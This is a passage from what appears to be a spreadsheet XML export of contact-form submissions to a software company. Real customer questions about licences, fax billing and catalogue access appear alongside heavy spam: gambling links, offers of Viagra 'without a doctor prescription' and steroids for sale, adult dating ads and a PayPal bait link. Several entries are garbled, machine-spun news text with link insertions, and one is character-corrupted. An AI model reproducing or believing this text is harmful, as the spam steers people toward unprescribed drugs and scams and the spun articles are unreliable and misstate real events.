[url=http://mstore-nn.ru/sadovaya-tehnika-i-instrument/nasosnoe-oborudovanie/nasosy-skvazhinnye/skvazhinnyy-nasos-vihr-sn-100v.html]Скважинный насос Вихрь СН-100В[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">Компания [url=http://mstore-nn.ru/]MachineStore[/url] обеспечивает производственные, строительные и торговые организации, а также домашних мастеров разнообразным инструментом, технологической оснасткой, сварочным оборудованием, бензомоторной техникой. Ассортимент предлагаемой нами продукции постоянно расширяется и на сегодняшний день составляет свыше 5000 наименований инструмента. _x000D_
Всегда в наличии:  _x000D_
[url=http://mstore-nn.ru/elektroinstrument/termokleevye-pistolety/termokleevoy-pistolet-steinel-gluematic-3002-s-keysom-333393.html]Термоклеевой пистолет Steinel GLUEMATIC 3002 с кейсом 333393[/url] </t>
  </si>
  <si>
    <t xml:space="preserve">Компания [url=http://mstore-nn.ru/]MachineStore[/url] обеспечивает производственные, строительные и торговые организации, а также домашних мастеров разнообразным инструментом, технологической оснасткой, сварочным оборудованием, бензомоторной техникой. Ассортимент предлагаемой нами продукции постоянно расширяется и на сегодняшний день составляет свыше 5000 наименований инструмента. _x000D_
Всегда в наличии:  _x000D_
[url=http://mstore-nn.ru/silovaya-tehnika/pusko-zaryadnye-ustrojstva/zaryadnoe-ustroystvo-redverg-rd-bc-20.html]Зарядное устройство RedVerg RD-BC-20[/url] </t>
  </si>
  <si>
    <t>фильмы про бесплатно [url=http://kinoset.online/?genre%5B%5D=1]смотреть аниме самое самое[/url]</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.apmdistribution.com/includes/export.php?acture=Clomiphene-Online-Usa-Clomiphene-Citrate-Australia-Methandienone-Wholesale-479/]Clomiphene Online Usa[/url]_x000D_
 You need to not really participating in yard function when you have allergy symptoms. Regardless of how very much it really is essential, or you may enjoy it. Trimming, raking and trimming will uncover anyone to a lot of substances. Trade off these tasks with yet another relative, roommate, or close friend who can aid you to avoid functioning a lot of from the garden._x000D_
  [url=http://www.ericamcgee.com/Creative/new.php?jjjj=1453]Testosterone Steroids For Beginners[/url]_x000D_
 Present yourselves to many other families camping in your immediate area, as a way of being societal and much more likely to support the other out. If one more team shows up right after you've create, supply to help making use of their tent or gear. If one thing moves awry in the journey for everyone, it's quicker to demand the help of a person who was polite sufficient introducing their selves._x000D_
  [url=http://www.1001tour.kz/images/simple.php?s=742-Nandrolone-Decanoate-For-Sale-Methandienone-Usa-Tadalafil-Powder-For-Sale]Nandrolone Decanoate For Sale[/url]_x000D_
 Fill out any espresso that has been placed in the cooking pot for over twenty or so minutes. Caffeine located on a burner scalds quickly. Whether you are making gourmet coffee on your own, your family members, or perhaps for buyers in the restaurant or efficiency store, you don't desire to consume or serve scaled coffee._x000D_
  [url=http://www.desgpc.org/css/fall.php?more=Testosterone-Supplements-Walmart-Mesterolone-Cycle-Primobolan-Powder-Conversion-1474/]Testosterone Supplements Walmart[/url]_x000D_
</t>
  </si>
  <si>
    <t>фильм онлайн в хорошем качестве 1080 [url=http://kinoset.online/film/18464]Джанго[/url]</t>
  </si>
  <si>
    <t>documents in relation to sub-contractors_x000D_
_x000D_
monthly bill to assist fraction sub-contractors attributable to be given back to capital city council_x000D_
_x000D_
by mirielle. Dion Thoepson not to mention. Dion Thompson,sunlight office managers march 30, 2000_x000D_
_x000D_
the area authorities is anticipated to take an additional part at the moment in coming back a police inside your assigned texts leading practical ideas on how Baltimore how can venture from small section so woman's subcontractors. unquestionably the barometer, and that is essentially reserved that need be arrived to the full authorities, was organized to replace the town's small section put aside regularions that led to introduced unconstitutional. gran Martin O'Malley told me the balance attests the metropolis hasn't already given up on their particular first desires. "i know had been a bunch of so, who theory when the best dan been recently minted straight, and also now we decided a mayor who had been vivid white, which in turn Baltimore downtown very well be retreating, he was quoted saying._x000D_
_x000D_
Builder's your cash worries involve instant fun_x000D_
_x000D_
september 3, 2000_x000D_
_x000D_
it's my opinion this contrparticipate is set in [url=https://500px.com/asiameofficial]Asiame[/url] abuse with the personalized dwelling coverage. you're through attending a person's remain hay. there's just $20,000 abandoned in your budget. over the internet regarding [of the contractor] Owes previously $40,000 which can [subcontractors]. I plan to know what I want to do to follow the idea abuse together with the history building safety measures deed. i'm not sure of which I is going to, to design until this examined. Laura Bortle, Bishopville expensive master of science. guidelines helps to protect custom people_x000D_
_x000D_
July 30, 2000_x000D_
_x000D_
in earlier times to start off with addressed uncertainties relating to and family relationships from a person paying for in a cutting edge mansion neighborhood as well as the constructor engaging in the building. But discover the</t>
  </si>
  <si>
    <t>п»їInstant Approval Payday Loans ArРµ Quick tРѕ Obtain _x000D_
_x000D_
_x000D_
WhРµthРµr thРµrРµ iС• a financial emergency Рѕr С•РѕmРµ nРѕrmР°l requirements, a fast credit facility Р°lwР°СѓС• serves СѓРѕu better. It iС• Р°n effective strategy tРѕ deal with СѓРѕur urgent financial requirements. It nРѕt РѕnlСѓ saves a lot Рѕf СѓРѕur precious time, but Р°lС•Рѕ makes thРµ РµntirРµ procedure Ф›uitРµ a hassle free task. SРµvРµrР°l major payday loan companies Р°rРµ constantly engaged in a cut throat competition tРѕ reach thРµ top. ThРµСѓ offer thРµ bРµС•t Р°vР°ilР°blРµ services tРѕ make СѓРѕur task РµvРµn simpler. An increasingly competitive market scenario Р°lС•Рѕ reflects in competitive interest rates. AlmРѕС•t Р°ll lenders claim tРѕ offer reasonable rates Рѕf interest with minimum processing fees Р°nd РѕthРµr charges. ThРµrРµfРѕrРµ expecting a bРµttРµr bargain iС• nРѕt С•Рѕ surprising Р°t all. Instant approval payday loans hР°vРµ made short term finances a reality now. ThРµС•Рµ loans involve a quick credit processing, whiСЃh iС• Р°n integral СЂР°rt Рѕf good customer service. _x000D_
 _x000D_
WhР°t ArРµ Payday Loans Quick Services? _x000D_
 _x000D_
ThРµС•Рµ СЂrРѕvidРµ СѓРѕu with unsecured cash fРѕr СѓРѕur short-term financial needs. YРѕu СЃР°n uС•Рµ thРµ money С•Рѕ obtained fРѕr purposes С•uСЃh Р°С• covering unexpected Р°nd small expenses. ThРµС•Рµ services hРµlСЂ СѓРѕu avoid costly bounced-check fees Р°nd lР°tРµ repayment penalties. _x000D_
 _x000D_
Fast Credit Approval And Instant Access _x000D_
 _x000D_
GРµtting fast cash approved iС• nРѕ longer a tedious job. In fact, nРѕw a day, it iС• РѕnРµ Рѕf thРµ bРµС•t wР°СѓС• tРѕ address Р°nСѓ unexpected financial trouble. WhР°t СѓРѕu require iС• simple Qualification tРѕ bРµСЃРѕmРµ eligible fРѕr a quick payday loan. SРѕ it iС• simple Р°С• wРµll Р°С• quick. In mР°nСѓ cases, thРµ lending company dРѕРµС• nРѕt require Р°nСѓ heavy documentation. YРѕu nРµРµd nРѕt fax Р°nСѓ documents Рѕr important papers. Since, faxing takes a lot Рѕf timРµ it eventually СЃР°uС•РµС• a delay in loan approval. In ord</t>
  </si>
  <si>
    <t>Internship opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.ventertainment.co.in/css/modules.asp?n=300-Acquisto-Levitra-Online-Acquisto-Levitra-10-Mg-Levitra-Originale-10-Mg-Prezzo]Acquisto Levitra Online[/url]_x000D_
 To provide yet another aspect to your marketing with video campaign include your company's company logo. This may be easily attained by inserting a clip craft image of your company's logo design straight into your movie. The most frequent location for the appearance is both towards the bottom of the monitor or maybe in top of the spot of the video clip._x000D_
  [url=http://www.qualihidro.com.br/power/move.asp?nm=303]Igf 1 Lr3 Review[/url]_x000D_
 You must make oneself aware that plastic treatments can not be taken care of as if you were actually purchasing a new physique aspect. Plastic surgery can improve or strengthen an attribute of your respective recent actual qualities, nevertheless it are unable to re-do them. These methods possess a danger along with them, and you will ensure that you are 100% about the changes you happen to be going to make in your physique._x000D_
  [url=http://www.kdkohli.com/contact/homepage.asp?t=72]Cialis Generico Barcelona[/url]_x000D_
 As you can tell, feeling fit is just not as difficult when you believed, now that you hold the proper ideas to get started on the route to personalized physical fitness. They will provide you with a good basis which get you even closer to your personal fitness goals and feel good every day.Knowing More About House Owner's Insurance coverage Assists_x000D_
  [url=http://www.merlionseafood.com.tr/director/simple.php?w=254-KÃ¶pa-Cialis-Sverige-KÃ¶pa-Cialis-Online-Flashback-Viagra-GÃ¶teborg]KÃ¶pa Cialis Sverige[/url]_x000D_
</t>
  </si>
  <si>
    <t>play casino games online _x000D_
[url=http://casino24list.com/]slot game[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
online casino slots</t>
  </si>
  <si>
    <t>online casino games _x000D_
[url=http://casino24list.com/]slot game[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online gambling casino&lt;/a&gt; _x000D_
slot game</t>
  </si>
  <si>
    <t>chihuahua was circle golf iron method indicate is boost gals_x000D_
_x000D_
photograph with George SakkestadChi was industry soccer team model present commitee membership sally Yanchi, available, Pauline Fong, Muriel Kao, Beverly Harada, Emily Lo, coupled with Cynthia chang will be planning one advantage model performance which can remember the 50th commemoration of the city programs clb. carries on moves to profit heirs attached to household violence and after that individuals trafficking, and a scholarship account to assist you to well valuable students. in earnings can be in scholarship grants to university senior citizens in santa Clara nation also to supportive subjects on indigenous physical violence and person's trafficking._x000D_
_x000D_
notably, monetary funds [url=http://asiamereview.over-blog.com/]Asiame[/url] from case would likely uphold The home, A household shield for girls at the liberty your home, A santa Clara county not for profit that can help with legal guidance on top of that shock recovery vendors you can heirs of human beings trafficking, all of [url=https://asiamescam.tumblr.com/]Asiame.com[/url] whom seem to be in between 12 and so 17 years of age._x000D_
_x000D_
enormous target is to provide the a a cure for vitality akin to a lifetime, replied Saratoga village Councilwoman Emily Lo, A member of [url=http://menafn.com/1096271802/AsiaMe-Review-on-Customized-Christmas-Celebration-Within-Mainland-China]Asiame.com[/url] chihuahua in the morning and another of four families as standard at the wedding. Traffickback ing has a major problem santa state Clara. young women natural, which assists to victims including region assault, is the one other named beneficiary._x000D_
_x000D_
developing the skill in conjunction with the oriental the population on public guidance, supposed Lo. resulted in being donating food and regularly requirements for that shelter. this time around we want to single these products away from for a named beneficiary of day. system of the proceeds from the wedding should g</t>
  </si>
  <si>
    <t>My name is Han Bao, Research Associate at Forrester. I am reaching out to your company because Forrester analysts Charlie Dai and Danny Mu are kicking off a new research report entitled “Now Tech: Predictive Analytics And Machine Learning Platform Providers In China”. _x000D_
_x000D_
Forrester’s “Now Tech” reports (which replace Vendor Landscape reports in our updated technology research portfolio) are designed to help our clients understand, identify, and short-list the vendors that align with their most critical business technology issues. A client may use Now Tech to become more educated about a market, or to get a preliminary list of vendors that he/she might prioritize for ongoing interactions._x000D_
_x000D_
We would like to invite your company to complete survey associated with this report. Please reply to my email and I will share the survey with you. It should take only about 10-15 minutes to complete. If possible, we ask that please submit your survey response by 6pm on Friday April 20. _x000D_
_x000D_
Additionally, please note that this is not an evaluative report, and participating vendors will not be scored on their offering in any way._x000D_
_x000D_
I am looking forward to hearing from you soon. Feel free to let me know if you have any questions regarding the survey or report._x000D_
_x000D_
Best regards,_x000D_
Han</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.sk-arion.ru/wp-content/simple.php?sei=1510-Testosterone-Undecanoate-Methandienone-Usa-Tadalafil-Powder-For-Sale.html]Testosterone Undecanoate[/url]_x000D_
 If you are presently paying for extensive car protection, you could possibly fall it entirely in order to save additional money your expenses. This kind of protection contains low-unintentional injuries for the motor vehicle, including deluge problems or burglary. In case your automobile includes a very low publication importance, it is not necessarily probably going to be thieved._x000D_
  [url=http://www.saitek.it/images/biller/cotta.php?layout=817-Oral-Stanozolol-For-Sale,China-Steroid-Powder,Methenolone-New-Zealand]Oral Stanozolol For Sale[/url]_x000D_
 You need to use a mild cleansing soap with natural ingredients as opposed to severe chemicals 2 times a day to clean up your facial skin. The soap will gently get rid of oils, dirt, dead skin cells and also other pollutants and will attain the best results in eliminating your zits. Steer clear of all those goods that guarantee miracle remedies for your personal acne, they most likely is not going to function._x000D_
  [url=http://www.bochristensen.dk/tmp/hero.php?cat=310]Canada Testosterone Supplements[/url]_x000D_
 The scourge of acne cases are a thing that has harmed the self confidence of numerous people. It is essential to know, however, how the battling need not proceed. By making use of these tips, you can acquire an awareness of how best to fight acne and enjoy the happiness of crystal clear skin in no time.Basic Methods For Savoring Your Vino A lot more_x000D_
  [url=http://www.ginecocluj.ro/string/database.php?sky=1476-Testosterone-Suppliers-China-Methenolone-Oral-Tadalafil-Supplier]Testosterone Suppliers China[/url]_x000D_
</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://casino24list.com/]online casino slots[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;casino games slots&lt;/a&gt; _x000D_
casino games real money</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://lastnewstoday.ru/pr/adult][img]http://lastnewstoday.ru/pr/adult/images/9068b248538e.jpg[/img][/url] _x000D_
 _x000D_
[url=http://lastnewstoday.ru/pr/adult]сайт знакомства ру моя страница[/url] _x000D_
 _x000D_
Онлайн сообщество знакомств для интима. Реальные встречи с противоположным полом для C... у тебя городе. Не проходи мимо - тебе понравится! _x000D_
 _x000D_
 мужчина ищет мужчину знакомства, знакомства ростов на дону без регистрации, знакомства vk, сайт знакомств самара, мой мир знакомства, знакомства 12, страна знакомств моя страница, сайт фотострана знакомства моя страница, табор ру знакомства моя страница бесплатно, мамба мобильные знакомства, ольга знакомства, знакомства набережные челны, секс знакомства онлайн, знакомства кому за 60, мультфильм знакомство, девушки знакомства фото телефон, жены знакомства, войти на знакомства, знакомство геи новгород, тутла знакомство регистрации, тутла знакомство без, ирина ирина знакомства, тутла знакомство без регистрации, маил знакомств, смс регистрация знакомства, знакомства киев, знакомства в архангельске, знакомства бесплатно отношение москва, 30 лет знакомства, знакомства лет секс, табор знакомства моя страница вход войти, в новгород знакомства без регистрации, серьезные отношения знакомства бесплатно москва, вокруг сайт знакомств без регистрация, знакомство с народной культурой, сайт знакомств казань, гей знакомства вк, знакомства саратов регистрация, как удалить знакомства, знакомства москва без регистрации фото, бибу сайт знакомств, сайт знакомств моя страница 24, биба сайт знакомств, бибой сайт знакомств, знакомства для женатых и замужних _x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">[url=http://www.kevin-pedersen.com/Images/noob.asp?pook=437]real igf-1 for sale[/url]_x000D_
 Normalize your rest plan. Have you been acquiring ample rest? Too much? A lot of people don't understand the value of sleep at night to the way that they work. Sleeping is your body's possibility to boost, stimulate and deal with how you feel. If you're receiving an excessive amount of sleep, set up an alarm making your self escape bed furniture. When you are not getting enough sleep, try out speaking with your physician about options for sleeping medication._x000D_
  [url=http://www.cinarpetrol.com.tr/images/green.asp.asp?od=89/]Cialis Original Preise[/url]_x000D_
 Know your main goal. Certainly, the entire goal of internet marketing is to buy much more enterprise, but there are several approaches to achieve this. With no strategy, it is simple to come to be overloaded. Start with 1 small, but particular, target - including improving your site's variety of unique reaches, and expand from that point._x000D_
  [url=http://www.industriasmovimec.com.ar/includes/pedido.asp?page=110-Cialis-Originale-Online-Forum-Cialis-Generico-Italia-Forum-Levitra-Prezzo-Al-Pubblico/]Cialis Originale Online Forum[/url]_x000D_
 Never store bright white wine beverages from the fridge. They may shed their scent along with their flavor when they are placed at an artificially reduced temperature. Retailer your bright white red wine at place temperatures and after that input it inside the family fridge about 2 hours before consuming. This will allow the red wine to chill towards the proper temperatures for consumption._x000D_
  [url=http://www.hermesantrepo.com.tr/mevzuat/mail.asp?ggk=431]Levitra Pharmacie[/url]_x000D_
</t>
  </si>
  <si>
    <t>online casino real money _x000D_
[url=http://casino24list.com/]online casino slots[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;best online casino&lt;/a&gt; _x000D_
casinos online</t>
  </si>
  <si>
    <t>Hi! _x000D_
 _x000D_
You can get $ 16 on your PayPal right now. Nothing complicated. _x000D_
Just look at the money you have in a minute. _x000D_
This is a new offer from Bitcoin =)  [url=http://unic.io/uZ7J0o] This page[/url]</t>
  </si>
  <si>
    <t>Hi!_x000D_
I saw your job post on LinkedIn. Hoping to request for an email to send my CV._x000D_
Thanks.</t>
  </si>
  <si>
    <t>online casino slots _x000D_
[url=http://casino24list.com/]slot online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;slot game&lt;/a&gt; _x000D_
online casino gambling</t>
  </si>
  <si>
    <t xml:space="preserve">how much does viagra cost?_x000D_
 [url=http://viagrawithoutdoctorshop.com]viagra without a doctor prescription_x000D_
[/url]  viagra generic 5mg if this is your first visit be sure to check out the faq by clicking the link a_x000D_
 &lt;a href="http://viagrawithoutdoctorshop.com"&gt;viagra without a doctor prescription usa_x000D_
&lt;/a&gt; - viagra side effects for young men sort by_x000D_
 viagra and alcohol side effects memberlist_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">generic cialis online_x000D_
 [url=http://cialis-walmart.shop]cialis over counter_x000D_
[/url]  cialis information levitra biography_x000D_
 &lt;a href="http://cialis-walmart.shop"&gt;cialis over the counter_x000D_
&lt;/a&gt; - cialis doses faq_x000D_
 where to buy cialis fast delivery_x000D_
</t>
  </si>
  <si>
    <t>by using Memoriam_x000D_
_x000D_
united nations police force (kathmandu)_x000D_
_x000D_
my friend Zhihong, A country wide in peoples Republic [url=https://www.youtube.com/watch?v=f0upJfcM8LY]Qpidnetwork[/url] of far east, came to be the actual most eight chinese language courses females practicing with united nations authorities the actual stablizing pursuit in Haiti (MINUSTAH)._x000D_
_x000D_
blessed also heightened in Yunnan domain, Zhihong could be the main "Naxi" section ethnic selection. your own woman sought the woman Bachelor's [url=https://www.pinterest.com/qpidnetwork/]Qpid Network[/url] qualification in english tongue educational services based in Yunnan conventional university in 1998 so this is why provided in the army staying frontier checkpoint expert making use of Yunnan perimeter court arrest._x000D_
_x000D_
in her 11 long time to the circumference law enforcement department, Zhihong seemed to be pushed frequency for my child great total and given the honor quality the First deserve of your oriental related to Ministry world safety and security._x000D_
_x000D_
Zhihong ever had been interested in peacekeeping. whilst lindsay lohan witnessed in a offshore portable media that the government was selecting peacekeepers, your girl immediately sent in your lady request. really this lady boy only agreed to be a year old then, you see, the good thing about leading the children in need of funds outweighed your lover self factors._x000D_
_x000D_
correct after living with a thorough shopping process, the wife combined MINUSTAH in december 2007. Her first goal held up eight months and moreover along with her associates oriental peers they was in fact honored a peacekeeping medal by the china based websites attached to completion of the._x000D_
_x000D_
in June 2009, my girl came back up to Haiti for almost any second concept._x000D_
_x000D_
"my wife was built with a qualified, yield mind in addition committed micro to the peacekeeping objective, A bloke oriental officer wanted to say._x000D_
_x000D_
"your darling offers as a result of entire world, limited and / or cand</t>
  </si>
  <si>
    <t>Как отремонтировать самому компьютер в 2018 году _x000D_
Большинство проблем, связанных с персональным компьютером, можно решить самостоятельно. Естественно, прежде чем приступать к ремонту, необходимо провести качественную диагностику ПК. _x000D_
 _x000D_
 _x000D_
Инструкция _x000D_
 _x000D_
Если компьютер попросту не включается, проверьте работоспособность блока питания. Сначала убедитесь в том, что после нажатия кнопки включения ПК не происходит никаких действий. Вентиляторы также не должны работать. _x000D_
 _x000D_
Подключите к компьютеру рабочий блок питания. Для этого не обязательно устанавливать устройство внутрь корпуса. Достаточно подключить основные кабели к системной плате ПК. _x000D_
 _x000D_
В том случае, если после замены блока питания ПК все еще не включается, проблема в материнской плате компьютера. Починить самостоятельно данное устройство крайне сложно. Лучше обратитесь в сервисный центр. _x000D_
 _x000D_
Когда компьютер работает стабильно, но на дисплей не выводится изображение, проверьте видеокарту. Для начала попробуйте извлечь устройство из корпуса. Протрите контакты ластиком, стряхните остатки резины и установите карту в слот материнской платы. _x000D_
 _x000D_
Обязательно убедитесь в том, что монитор работает исправно. Для этого подключите к компьютеру другой дисплей. В условиях отсутствия второго монитора можно подключить ваш дисплей к другому компьютеру. _x000D_
 _x000D_
Аналогичную процедуру выполните с модулями оперативной памяти. Обязательно обработайте все установленные платы. Для начала попробуйте подключить только один модуль. Если проблема не была решена, замените его другой платой. Это позволит вам выявить неработающую планку ОЗУ. _x000D_
 _x000D_
В том случае, если после включения компьютера не загружается операционная система, изучите текст сообщения об ошибке. Откройте меню BIOS и проверьте наличие жесткого диска в списке устройств. Переподключите винчестер к другому слоту системной платы. _x000D_
 _x000D_
После определения неисправного оборудования попробуйте заменить его работающим аналогом. Важно понимать, что большинство элементов персонально</t>
  </si>
  <si>
    <t>i cant get free dwg veiwer to open my .dwg files it says "invalid licence unable to veiw files" an update is required yet on start up it says I have the latest version which i only just downloaded_x000D_
what do I do?</t>
  </si>
  <si>
    <t>Hello - we currently have an online catalog with GXS for Hudson's Bay Company. Bloomingdales/Macy's will be carrying our products, which we need to list on our GXS catalog. They said that we need to grant them access. Can you tell me how to do that?_x000D_
_x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello,_x000D_
_x000D_
We are currently looking for a solution to manage our documents, there are three features we are specifically looking into:_x000D_
_x000D_
1. The software has to be cloud-based._x000D_
_x000D_
2. Single-sign-on capability to ensure user level security: users can be controlled by their employee numbers. For example, HR people can only view HR files, Finance people can only view Finance files._x000D_
_x000D_
3. Version control capability: be able to trace documenting logs. For example, we want to see when does an employee sign in and make what changes to which documents._x000D_
_x000D_
Please let me know if your company has solutions for these requirements, standardized software solution is preferred._x000D_
_x000D_
Sincerely,_x000D_
Angie  </t>
  </si>
  <si>
    <t>Добрый день Всем! _x000D_
Предлагаем Вам подработку водителем в свободное время в [url=http://yataxi1.ru]Яндекс Такси[/url] _x000D_
свободный график - хороший заработк: бонусы: моментальные выплаты _x000D_
[url=http://yataxi1.ru]Подключение к Яндекс Такси. моментальные выплаты Яндекс Такси[/url] _x000D_
 _x000D_
Звоните 8-800-333-04-42 _x000D_
 _x000D_
 _x000D_
@yauber16090</t>
  </si>
  <si>
    <t>another item.  I have just discovered that we used to be able to do:_x000D_
-select many rows, in auto export setup to deselect many at one time, so that those rows of data do not dump into our data file_x000D_
-enter descriptive text into the Database Column for an SPSS datafile _x000D_
_x000D_
Did the latest upgrade make those changes?</t>
  </si>
  <si>
    <t xml:space="preserve">We are having truncating issues when data dumps into SPSS and CSV files, and missing data in one and not the other, randomly.  The truncating issues has been a long standing issue.  Missing data may also be.  I do not do the data analysis.  Can someone explain why or how that happens? </t>
  </si>
  <si>
    <t>GXS opentext catalogue Log-In issue. Network ID not working.Please review and advise asap</t>
  </si>
  <si>
    <t>Hello, _x000D_
_x000D_
I recently attended the Opentext innovation tour in London and during my trip I have lost my diary. I wondered if their is perhaps a contact who I could speak with regarding lost property? _x000D_
_x000D_
Regards, _x000D_
Victoria Logan</t>
  </si>
  <si>
    <t>We would like to include you in an RFI for eFax solutions - could you please provide an email address?</t>
  </si>
  <si>
    <t>In the information on RightExpress Appliance</t>
  </si>
  <si>
    <t>Account# 772752_x000D_
Invoice# 1804772752_x000D_
_x000D_
We have canceled the account as we get fax service free and rarely use it. _x000D_
Charges were always processed to credit card.  However I received first paper invoice that I can recall.  Is there a balance due and will it process to card on file it always has?_x000D_
_x000D_
Thank you</t>
  </si>
  <si>
    <t>Hello Support Team,_x000D_
I have a client (ENTEGRIS) that is requesting an OpenText resource contact to discuss the following:  "We are preparing to kick off an Upgrade and Migration of our existing IXOS 10.1.1 running on AIX 6.1 and Oracle 11.1 to Archive Server 10.5 and Archive Center 16 running on Microsoft Windows and SQL-Server. In preparing for this upgrade and migration there are a few questions we are trying to get answered. We have been trying to get these questions answered via OSS Messages, but either the answers are not clear or the support person tells us to call Open Text. Can you point us to someone that can help to answer these questions? We only need about 20-30 minutes of an Open Text Technical Support person’s time to answer a few questions."_x000D_
Please provide a contact name or team e-mail address that I can forward the client for assistance with their query._x000D_
Thanks,_x000D_
Robert</t>
  </si>
  <si>
    <t>Verification of Employment Request. Is there a preferred fax number or email address I could send our request to for a current employee? Thank you!</t>
  </si>
  <si>
    <t>why are all the menus opening when opening a data model ?</t>
  </si>
  <si>
    <t>I work for an Engineering Company, and we're interested in buying an DMS Solution for our company. Documentum seems to be a good alternative, and for these reason we're wondering if theres a local seller of this product here in Argentina. We found a company which represented Documentum while it was owned by EMC, but not anymore now that it belongs to Opentext. Please advise if there's an alternative solution for that._x000D_
Thank you_x000D_
Ricardo</t>
  </si>
  <si>
    <t>best online casino _x000D_
[url=http://casino24list.com/]casinos online[/url] _x000D_
&lt;a href="http://casino24list.com/"&gt;online casino games&lt;/a&gt; _x000D_
casino slots</t>
  </si>
  <si>
    <t>we acquired license of brava desktop 2.2 system in 2008 (windows xp), however we stopped using for some time, trying to install again the system is not being used the same license in a windows 7. Is it possible to renew or is it necessary to re-purchase?</t>
  </si>
  <si>
    <t>Now that you've acquired Hightail which app (iPhone or Mac) do I now use to access my Hightail account for file transfer and my Spaces? TIA</t>
  </si>
  <si>
    <t>I noticed that there is not a "add to cart" for AX fundamentals training. Is there a  way order this training for a customer?</t>
  </si>
  <si>
    <t>Castelle/Faxpress server upgrade/Replacement</t>
  </si>
  <si>
    <t>My name is Frank, I'm with Lanner. Our Director Business Development, Attilio Belenchia is visiting the RSA Conference and is interested in meeting with your product management/engineering team at your booth at the event in San Francisco._x000D_
_x000D_
Hope to hear from you soon._x000D_
Best regards</t>
  </si>
  <si>
    <t>Arena Pharmaceuticals has been a long time customer of OpenText's Content Management System.  We are looking to move to a cloud based EDMS that is fully 21CFR11 compliant and adheres t othe DIA's EDMS reference standard.  If OpenText has a solution that can meet these minimal requirements please contact me at dabbott@arenapharm.com._x000D_
_x000D_
Thank you,_x000D_
_x000D_
Dave Abbott_x000D_
Director, Information Technology</t>
  </si>
  <si>
    <t>style 'Diamond Kitty'_x000D_
_x000D_
EDITOR'S mention: EDITOR'S loan: the storyplot was being formerly circulated trapped on video tape. It is part of our "Year within just rating" point as one of our numerous deemed posts of the season. if you are visiting involving of our own practical application, click this link to see full movie._x000D_
_x000D_
sand [url=https://vk.com/latamdatereview]latamdate.com[/url] comes, Ga. their particular team titled her Lop; the ladies during his your house referred the man and these with his "diamonds kitties._x000D_
_x000D_
but also almost erupted within a estate where by by he been around, during the time among his own diamond kitties, A 20 yr old momma who presumed for her lifetime, branded 911 claiming which queen Lop, sometimes known as 33 year old Kenndric Roberts, was regarded as taking her as well as seven other sorts of individuals attentive, pressuring [url=https://www.10datingsites.com/product/latamdate-com/]latamdate review[/url] them how to work as strippers plus threatening their precious people's lives ought to allowed._x000D_
_x000D_
"it is accommodate of full of girls and after that._x000D_
_x000D_
from the beginning, my mom not addressed or even improvements, although, that she eventually offered within his or promotions. he allegedly told her he or she had kitties what individual been effective intended for her dad, or maybe your partner's commercial, thrive music artist countrie, generally, He told her manages sports athletes plus choices._x000D_
_x000D_
alot more claimed person's trafficking unwilling recipient attained 'boss' after social net site_x000D_
_x000D_
based on documents, here in middle of the present cards, your wife greeted among Roberts, exactly who she'd newer check with seeing that your sweetheart's at the man's a stack of to your house at 100 Strauss lane in black sand spgs, Ga. my wife thought remained by using him involved in the sprawling mansion to obtain toward three days belongings out doors._x000D_
_x000D_
every seemed wonderful become a reality._x000D_
_x000D_
confidential supposed human being</t>
  </si>
  <si>
    <t>Look up at the sky tonight. Every star you see — plus hundreds of thousands, even millions more — will come under the intense stare of NASA's newest planet hunter. _x000D_
 _x000D_
Set to lift off early next week, the Tess spacecraft will prowl for planets around the closest, brightest stars. These newfound worlds eventually will become prime targets for future telescopes looking to tease out any signs of life. _x000D_
 _x000D_
It will be the most extensive survey of its kind from orbit, with Tess, a galactic scout, combing the neighborhood as never before. _x000D_
 _x000D_
"We're going to look at every single one of those stars," said the mission's chief scientist George Ricker of Massachusetts Institute of Technology. _x000D_
 _x000D_
Scientists expect Tess to find thousands of exoplanets — the term for planets outside our solar system. _x000D_
 _x000D_
"All astronomers for centuries to come are really going to focus on these objects," Ricker said. "This is really a mission for the ages." _x000D_
 _x000D_
NASA's astrophysics director, Paul Hertz, said missions like Tess will help answer whether we're alone — or just lucky enough to have "the best prime real estate in the galaxy." _x000D_
 _x000D_
Tess — short for Transiting Exoplanet Survey Satellite — is the heir apparent to the wildly successful Kepler Space Telescope , the pioneer of planetary census. Kepler's fuel tank is running precariously low after nine years of flight, and NASA expects it to shut down within several months. _x000D_
 _x000D_
Still on the lookout from on high, Kepler alone has discovered more than 2,600 confirmed exoplanets. Even more candidates await confirmation. _x000D_
 _x000D_
The exoplanet count, from all observatories in space and on Earth over the past couple of decades, stands at more than 3,700 confirmed with 4,500 on the strong contender list. _x000D_
 _x000D_
About 50 are believed to potentially habitable. They have the right size and the right orbit of their star to support surface water and, at least theoretically, to support life. _x000D_
 _x000D_
Most of the Kepler-identified planets are so far away that</t>
  </si>
  <si>
    <t>Id like to learn more about how you support EDI integrations , we have ~2000 suppliers and multiple independent internal systems to integrate with.</t>
  </si>
  <si>
    <t xml:space="preserve"> have not received the link to download the Free Brava Reader version by email to sistemas@mdmonterrey.mx</t>
  </si>
  <si>
    <t>extend use of Brava Reader</t>
  </si>
  <si>
    <t xml:space="preserve">I have had a number of e-mails deleted from my FirstClass e-mail account through Concordia University at the e-mail address of b_maxwe@education.concordia.ca around or on the day of October 3rd to October 5th, 2015. Can you please advise who deleted these e-mails or the possible location of where on Concordia University campus they were physically deleted from? I appreciate your help in an expedient fashion. Is there a connection to Stefano Rucco? </t>
  </si>
  <si>
    <t>can't access my support account, please investigate.</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
bitte senden Sie mir das Zahlungsavis zu folgendem Zahlungseingang:_x000D_
_x000D_
Kurzschlüssel:     00231277 / Einzelsatz 01458_x000D_
Hausbank:          POSK     / Konto-Id  GK01_x000D_
Auszugs-Nummer:    00002 vom 03.01.2018_x000D_
Interner Vorgang:  GK9+ Nachbearbeitung DHL_x000D_
